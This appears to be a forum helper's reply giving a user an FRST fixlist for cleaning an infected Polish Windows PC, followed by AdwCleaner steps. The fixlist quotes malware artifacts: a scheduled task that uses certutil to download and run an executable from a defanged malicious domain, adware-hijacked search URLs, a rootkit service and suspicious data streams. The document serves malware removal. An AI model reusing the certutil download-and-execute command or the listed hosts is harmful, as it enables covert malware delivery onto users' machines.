Open the system Notepad and paste:

ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku
Task: {205F0A60-064B-4D4C-9CF6-CC466D0A1991} - \csrss -> Brak pliku <==== UWAGA
Task: {3F30CC20-B3C5-4E02-9FF2-8BDEF7BB272E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/scheduled/3/scheduled.exe C:\Users\Kuba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kuba\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {734CE9B1-E439-4BED-A4A9-1306D242161C} - System32\Tasks\MRT => C:\Users\Kuba\AppData\Local\Temp\csrss\mrt.exe [2018-06-15] () <==== UWAGA
Task: {8EB80958-6D34-419D-BE6C-788AA1546BFA} - System32\Tasks\{1C6EFE69-C766-4F60-A464-5BDA7399AD57} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon"
Task: {A2EF6F6E-6566-4E1B-8A63-47C36EFB034F} - System32\Tasks\{D3041705-4CE3-4276-9183-F4F2355418F8} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RAMRush\unins000.exe"
Task: {C13771E8-7778-45F6-97CB-469C61C45C87} - \AMDProcess -> Brak pliku <==== UWAGA
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [432]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [432]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432]
AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432]
AlternateDataStreams: C:\ProgramData\Microsoft:efXotG05zzSzCUqi9kDcxxjh [2438]
AlternateDataStreams: C:\ProgramData\Microsoft:mfUoNsXyhwJSpsZBWMs [2014]
AlternateDataStreams: C:\ProgramData\Microsoft:NtrbQu2dsjIempiM22EJT9 [2058]
AlternateDataStreams: C:\ProgramData\Microsoft:SoVmKoEG8Qb7mdtDDQnX28N92 [2682]
AlternateDataStreams: C:\ProgramData\Microsoft:zL27CRe1GnKmL72Ns5nDyJ [1956]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432]
AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [540]
AlternateDataStreams: C:\Users\Kuba\Dane aplikacji:NT [40]
AlternateDataStreams: C:\Users\Kuba\Dane aplikacji:NT2 [432]
AlternateDataStreams: C:\Users\Kuba\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Kuba\AppData\Roaming:NT2 [432]
AlternateDataStreams: C:\Users\Kuba\AppData\Local\Temp:eUyH3GhJarTRH8zsUdXb [2118]
AlternateDataStreams: C:\Users\Kuba\AppData\Local\Temporary Internet Files:J8WXs4zemxCc4V8BJ [2116]
HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Classes\regfile: regedit.exe "%1" <==== UWAGA
HKLM-x32\...\RunOnce: [D:\mbam-chameleon-3.1.33.0\Chameleon\Windows\irbh] => cmd /C rd "D:\mbam-chameleon-3.1.33.0\Chameleon\Windows\irbh" /s/q
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => "C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe" "C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware"
IFEO\dvssysreport.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\freescreenvideorecorder.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\freestudiomanager.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\premiummembershipoffer.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\uninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_Xk1y6O33Xx5_0ZdeAvLk_CtdIi-eWV33B8PuMy8J2FfPMlyLnKRhNN8NYs0fdzGtnTHckqlYg2xbVHfNpfXj4DR43osA,,&q={searchTerms}
HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_Xo8KG50NQCIHA64V7ZL_OGrRrv2CDHKA6O833u76l2Pw338OppECy7LIjBFokOdzWtryU-sSs-lbwPS8pvbmhc9XOL8w,,
SearchScopes: HKU\S-1-5-21-2599105244-4264042397-500321054-1000 -> DefaultScope {ielnksrch} URL =
CHR res: Zainfekowany resources.pak (Adware script). Przeinstaluj Chrome. <==== UWAGA
CHR DefaultSearchURL: Default -> hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_XkwJvAmlzqLFmizel4JbVO3F2n14jrJCaRC3SE45yYpmZrMT_1q4IDrePYJaafMfbXk19deUn1Zk0ksCXPA7e1KyDkqA,,&q={searchTerms}
CHR DefaultSearchKeyword: Default -> feed.sonic-search.com
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
HKLM\SYSTEM\CurrentControlSet\Services\WinmonFS <==== UWAGA (Rootkit!)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 NAVENG; \??\C:\Program Files\Norton Internet Security\NortonData\22.9.1.12\Definitions\SDSDefs\20180131.002\NAVENG.SYS [X]
S3 NAVEX15; \??\C:\Program Files\Norton Internet Security\NortonData\22.9.1.12\Definitions\SDSDefs\20180131.002\NAVEX15.SYS [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder. Run FRST as administrator and click Fix (Napraw).

Download AdwCleaner and run it as administrator: https://toolslib.net/downloads/finish/1/
Click Scan (Skanuj) and then Cleaning (Oczyść).